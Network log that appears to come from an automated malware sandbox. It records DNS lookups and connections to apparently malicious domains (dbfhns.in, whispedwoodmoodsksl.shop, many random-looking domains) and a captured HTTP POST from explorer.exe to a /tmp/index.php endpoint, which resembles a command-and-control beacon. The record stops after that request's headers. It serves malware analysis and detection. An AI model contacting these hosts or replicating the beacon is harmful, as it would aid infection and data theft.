                                                          May 27, 2024 00:28:37.816746950 CEST4434977165.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:38.543207884 CEST4434977165.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:38.543263912 CEST49771443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:38.558224916 CEST49771443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:38.558231115 CEST4434977165.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:38.558379889 CEST49771443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:38.558384895 CEST4434977165.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:38.558434963 CEST49771443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:38.558444023 CEST4434977165.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:38.558449984 CEST49771443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:38.558454990 CEST4434977165.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:38.558541059 CEST49771443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:38.558567047 CEST4434977165.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:38.558585882 CEST49771443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:38.558608055 CEST4434977165.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:38.558636904 CEST49771443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:38.558650017 CEST4434977165.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:38.558660030 CEST49771443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:38.558666945 CEST4434977165.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:38.559320927 CEST49771443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:38.559335947 CEST4434977165.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:38.559988022 CEST49771443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:38.560000896 CEST4434977165.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:39.967356920 CEST4434977165.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:39.967430115 CEST4434977165.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:39.967585087 CEST49771443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:39.967781067 CEST49771443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:39.967807055 CEST4434977165.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:40.248222113 CEST49772443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:40.248265982 CEST4434977265.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:40.248362064 CEST49772443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:40.250401020 CEST49772443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:40.250418901 CEST4434977265.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:40.944776058 CEST4434977265.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:40.944834948 CEST49772443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:40.952848911 CEST49772443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:40.952855110 CEST4434977265.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:40.953001022 CEST49772443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:40.953006983 CEST4434977265.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:41.714318991 CEST4434977265.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:41.714396954 CEST49772443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:41.714399099 CEST4434977265.109.242.59192.168.2.5
                                                          May 27, 2024 00:28:41.714473963 CEST49772443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:41.822515965 CEST49772443192.168.2.565.109.242.59
                                                          May 27, 2024 00:28:41.822560072 CEST4434977265.109.242.59192.168.2.5
                                                          May 27, 2024 00:29:06.962454081 CEST4977380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:06.967482090 CEST8049773186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:06.967586040 CEST4977380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:06.967757940 CEST4977380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:06.967777967 CEST4977380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:07.018054008 CEST8049773186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:07.067332029 CEST8049773186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:08.052684069 CEST8049773186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:08.057291985 CEST8049773186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:08.057357073 CEST4977380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:08.311558962 CEST4977380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:08.317018986 CEST8049773186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:14.069562912 CEST4977480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:14.086126089 CEST8049774186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:14.086369991 CEST4977480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:14.086644888 CEST4977480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:14.086675882 CEST4977480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:14.126101971 CEST8049774186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:14.175410986 CEST8049774186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:15.142350912 CEST8049774186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:15.142402887 CEST8049774186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:15.142494917 CEST4977480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:15.229074001 CEST4977480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:15.242367029 CEST8049774186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:19.592089891 CEST4977580192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:19.603674889 CEST8049775186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:19.603796005 CEST4977580192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:19.604016066 CEST4977580192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:19.604016066 CEST4977580192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:19.612844944 CEST8049775186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:19.615550041 CEST8049775186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:20.635092974 CEST8049775186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:20.635116100 CEST8049775186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:20.635191917 CEST4977580192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:20.635344982 CEST4977580192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:20.647300959 CEST8049775186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:27.732888937 CEST4977680192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:27.743346930 CEST8049776186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:27.743451118 CEST4977680192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:27.743669987 CEST4977680192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:27.743717909 CEST4977680192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:27.794313908 CEST8049776186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:27.839508057 CEST8049776186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:28.763854980 CEST8049776186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:28.769768000 CEST8049776186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:28.769877911 CEST4977680192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:28.769927979 CEST4977680192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:28.822061062 CEST8049776186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:33.750857115 CEST4977780192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:33.855387926 CEST8049777186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:33.855490923 CEST4977780192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:33.855725050 CEST4977780192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:33.856026888 CEST4977780192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:33.937439919 CEST8049777186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:33.937454939 CEST8049777186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:34.922079086 CEST8049777186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:34.971318960 CEST8049777186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:34.971478939 CEST4977780192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:34.971504927 CEST4977780192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:35.026099920 CEST8049777186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:39.890469074 CEST4977880192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:39.895517111 CEST8049778186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:39.895595074 CEST4977880192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:39.895797014 CEST4977880192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:39.895843029 CEST4977880192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:39.946001053 CEST8049778186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:39.991312027 CEST8049778186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:40.945394993 CEST8049778186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:40.950151920 CEST8049778186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:40.950280905 CEST4977880192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:40.950403929 CEST4977880192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:40.960064888 CEST8049778186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:47.861553907 CEST4977980192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:47.866528988 CEST8049779186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:47.866626024 CEST4977980192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:47.866786957 CEST4977980192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:47.866815090 CEST4977980192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:47.918068886 CEST8049779186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:47.967252970 CEST8049779186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:48.894093037 CEST8049779186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:48.939308882 CEST8049779186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:48.939318895 CEST8049779186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:48.939451933 CEST4977980192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:48.939451933 CEST4977980192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:48.950061083 CEST8049779186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:52.933819056 CEST4978080192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:52.938958883 CEST8049780186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:52.939085960 CEST4978080192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:52.939237118 CEST4978080192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:52.939274073 CEST4978080192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:52.994111061 CEST8049780186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:53.043358088 CEST8049780186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:53.945550919 CEST8049780186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:53.950310946 CEST8049780186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:53.950417042 CEST4978080192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:53.950522900 CEST4978080192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:53.960242033 CEST8049780186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:58.328675985 CEST4978180192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:58.334119081 CEST8049781186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:58.334203005 CEST4978180192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:58.334388971 CEST4978180192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:58.334429026 CEST4978180192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:58.390449047 CEST8049781186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:58.443182945 CEST8049781186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:59.526978970 CEST8049781186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:59.531678915 CEST8049781186.112.12.192192.168.2.5
                                                          May 27, 2024 00:29:59.531765938 CEST4978180192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:59.531805992 CEST4978180192.168.2.5186.112.12.192
                                                          May 27, 2024 00:29:59.582586050 CEST8049781186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:05.844041109 CEST4978280192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:05.849111080 CEST8049782186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:05.849220991 CEST4978280192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:05.849412918 CEST4978280192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:05.849412918 CEST4978280192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:05.906563044 CEST8049782186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:05.952542067 CEST8049782186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:06.899574041 CEST8049782186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:06.904723883 CEST8049782186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:06.904978991 CEST4978280192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:06.907879114 CEST4978280192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:06.914725065 CEST8049782186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:11.300515890 CEST4978380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:11.305608034 CEST8049783186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:11.305713892 CEST4978380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:11.305895090 CEST4978380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:11.305944920 CEST4978380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:11.358172894 CEST8049783186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:11.403393984 CEST8049783186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:12.513031006 CEST8049783186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:12.517847061 CEST8049783186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:12.518043041 CEST4978380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:12.518043041 CEST4978380192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:12.528981924 CEST8049783186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:16.959786892 CEST4978480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:16.964862108 CEST8049784186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:16.964952946 CEST4978480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:16.965106964 CEST4978480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:16.965137005 CEST4978480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:17.018687010 CEST8049784186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:17.066822052 CEST8049784186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:17.984780073 CEST8049784186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:17.990066051 CEST8049784186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:17.990134001 CEST4978480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:17.990181923 CEST4978480192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:18.042779922 CEST8049784186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:23.445720911 CEST4978580192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:23.451380968 CEST8049785186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:23.451493025 CEST4978580192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:23.451714039 CEST4978580192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:23.451714993 CEST4978580192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:23.506361008 CEST8049785186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:23.551415920 CEST8049785186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:24.474302053 CEST8049785186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:24.479024887 CEST8049785186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:24.479109049 CEST4978580192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:24.479141951 CEST4978580192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:24.488962889 CEST8049785186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:28.687268019 CEST4978680192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:28.701802969 CEST8049786186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:28.701883078 CEST4978680192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:28.702004910 CEST4978680192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:28.702028036 CEST4978680192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:28.754256010 CEST8049786186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:28.772886038 CEST8049786186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:29.990979910 CEST8049786186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:29.996114016 CEST8049786186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:29.996239901 CEST4978680192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:29.996239901 CEST4978680192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:30.007256031 CEST8049786186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:34.789482117 CEST4978780192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:34.842993021 CEST8049787186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:34.843102932 CEST4978780192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:34.843314886 CEST4978780192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:34.843359947 CEST4978780192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:34.881822109 CEST8049787186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:34.881838083 CEST8049787186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:35.907485008 CEST8049787186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:35.907525063 CEST8049787186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:35.907603025 CEST4978780192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:35.907757998 CEST4978780192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:35.947387934 CEST8049787186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:42.015194893 CEST4978880192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:42.022214890 CEST8049788186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:42.022305965 CEST4978880192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:42.022425890 CEST4978880192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:42.022459030 CEST4978880192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:42.036587954 CEST8049788186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:42.036598921 CEST8049788186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:43.034023046 CEST8049788186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:43.041055918 CEST8049788186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:43.041167021 CEST4978880192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:43.041296005 CEST4978880192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:43.066526890 CEST8049788186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:47.762532949 CEST4978980192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:47.787111998 CEST8049789186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:47.787236929 CEST4978980192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:47.787369013 CEST4978980192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:47.787408113 CEST4978980192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:47.799004078 CEST8049789186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:47.837012053 CEST8049789186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:48.800028086 CEST8049789186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:48.801170111 CEST8049789186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:48.801382065 CEST4978980192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:48.801382065 CEST4978980192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:49.080751896 CEST8049789186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:49.080921888 CEST4978980192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:49.088643074 CEST8049789186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:49.088655949 CEST8049789186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:49.088737965 CEST4978980192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:56.366600037 CEST4979080192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:56.386851072 CEST8049790186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:56.386996984 CEST4979080192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:56.387180090 CEST4979080192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:56.387204885 CEST4979080192.168.2.5186.112.12.192
                                                          May 27, 2024 00:30:56.401667118 CEST8049790186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:56.401680946 CEST8049790186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:57.441029072 CEST8049790186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:57.441046000 CEST8049790186.112.12.192192.168.2.5
                                                          May 27, 2024 00:30:57.441118002 CEST4979080192.168.2.5186.112.12.192

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          May 27, 2024 00:27:13.974567890 CEST5847853192.168.2.51.1.1.1
                                                          May 27, 2024 00:27:13.999315977 CEST53584781.1.1.1192.168.2.5
                                                          May 27, 2024 00:27:24.792143106 CEST5802153192.168.2.51.1.1.1
                                                          May 27, 2024 00:27:24.812468052 CEST53580211.1.1.1192.168.2.5
                                                          May 27, 2024 00:27:55.144258022 CEST5095653192.168.2.51.1.1.1
                                                          May 27, 2024 00:27:55.152259111 CEST53509561.1.1.1192.168.2.5
                                                          May 27, 2024 00:29:06.345964909 CEST5335853192.168.2.51.1.1.1
                                                          May 27, 2024 00:29:06.961252928 CEST53533581.1.1.1192.168.2.5

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          May 27, 2024 00:27:13.974567890 CEST192.168.2.51.1.1.10xd59Standard query (0)dbfhns.inA (IP address)IN (0x0001)false
                                                          May 27, 2024 00:27:24.792143106 CEST192.168.2.51.1.1.10xb381Standard query (0)whispedwoodmoodsksl.shopA (IP address)IN (0x0001)false
                                                          May 27, 2024 00:27:55.144258022 CEST192.168.2.51.1.1.10x3cdcStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                          May 27, 2024 00:29:06.345964909 CEST192.168.2.51.1.1.10x206eStandard query (0)dbfhns.inA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          May 27, 2024 00:27:13.999315977 CEST1.1.1.1192.168.2.50xd59No error (0)dbfhns.in187.143.58.5A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:27:13.999315977 CEST1.1.1.1192.168.2.50xd59No error (0)dbfhns.in213.172.74.157A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:27:13.999315977 CEST1.1.1.1192.168.2.50xd59No error (0)dbfhns.in186.145.236.93A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:27:13.999315977 CEST1.1.1.1192.168.2.50xd59No error (0)dbfhns.in95.158.162.200A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:27:13.999315977 CEST1.1.1.1192.168.2.50xd59No error (0)dbfhns.in123.140.161.243A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:27:13.999315977 CEST1.1.1.1192.168.2.50xd59No error (0)dbfhns.in197.44.77.26A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:27:13.999315977 CEST1.1.1.1192.168.2.50xd59No error (0)dbfhns.in186.101.193.110A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:27:13.999315977 CEST1.1.1.1192.168.2.50xd59No error (0)dbfhns.in5.42.246.42A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:27:13.999315977 CEST1.1.1.1192.168.2.50xd59No error (0)dbfhns.in190.28.110.209A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:27:13.999315977 CEST1.1.1.1192.168.2.50xd59No error (0)dbfhns.in190.13.174.94A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:27:24.812468052 CEST1.1.1.1192.168.2.50xb381No error (0)whispedwoodmoodsksl.shop188.114.97.3A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:27:24.812468052 CEST1.1.1.1192.168.2.50xb381No error (0)whispedwoodmoodsksl.shop188.114.96.3A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:27:55.152259111 CEST1.1.1.1192.168.2.50x3cdcNo error (0)steamcommunity.com104.102.42.29A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:29:06.961252928 CEST1.1.1.1192.168.2.50x206eNo error (0)dbfhns.in186.112.12.192A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:29:06.961252928 CEST1.1.1.1192.168.2.50x206eNo error (0)dbfhns.in186.233.231.45A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:29:06.961252928 CEST1.1.1.1192.168.2.50x206eNo error (0)dbfhns.in190.28.110.209A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:29:06.961252928 CEST1.1.1.1192.168.2.50x206eNo error (0)dbfhns.in190.187.52.42A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:29:06.961252928 CEST1.1.1.1192.168.2.50x206eNo error (0)dbfhns.in63.143.98.185A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:29:06.961252928 CEST1.1.1.1192.168.2.50x206eNo error (0)dbfhns.in109.98.58.98A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:29:06.961252928 CEST1.1.1.1192.168.2.50x206eNo error (0)dbfhns.in181.52.122.51A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:29:06.961252928 CEST1.1.1.1192.168.2.50x206eNo error (0)dbfhns.in201.119.118.19A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:29:06.961252928 CEST1.1.1.1192.168.2.50x206eNo error (0)dbfhns.in189.143.157.177A (IP address)IN (0x0001)false
                                                          May 27, 2024 00:29:06.961252928 CEST1.1.1.1192.168.2.50x206eNo error (0)dbfhns.in187.152.16.62A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • whispedwoodmoodsksl.shop
                                                          • steamcommunity.com
                                                          • 65.109.242.59
                                                          • nbtdsjawscshri.net
                                                            • dbfhns.in
                                                          • gitrvlonrfqrq.com
                                                          • ltjhtqaytuwkyt.net
                                                          • rjjvubikquby.com
                                                          • ctkjptrcxdnjtm.net
                                                          • eisoaquivduh.com
                                                          • 45.129.96.86
                                                          • wbiuottwvhtdjd.com
                                                          • eevetcrfdfleqxq.com
                                                          • unanbdkiibq.com
                                                          • hfcngeudnubrryg.com
                                                          • 23.145.40.124
                                                          • 185.235.137.54
                                                          • fgaaagvpavk.org
                                                          • qvvaotfskdoxlio.com
                                                          • 91.202.233.231
                                                          • ipxqunnvdoai.net
                                                          • xrjlnlbrgajqsny.com
                                                          • uopupolbajboxnf.net
                                                          • imsuruvsrfypw.com
                                                          • uvpyitsqtsmmqygu.com
                                                          • yowyackmlvbjrxy.org
                                                          • jkbknieekjatcp.org
                                                          • txclniyqjcys.com
                                                          • kmtbjhmhexqkn.com
                                                          • jsnmddlhyunj.org
                                                          • eamimphmsadwkq.net
                                                          • anyyjopgfajdv.com
                                                          • tlfkitushftrjirb.org
                                                          • plbuqwbmoldqvnm.org
                                                          • tjxcjquxocrwkw.net
                                                          • wmlhlokjcexweyx.net
                                                          • vjusdpgryce.org
                                                          • ajfprnyfteagngdf.net
                                                          • nqimnaeauxblwda.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.549711187.143.58.5801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:14.005469084 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://nbtdsjawscshri.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 308
                                                          Host: dbfhns.in
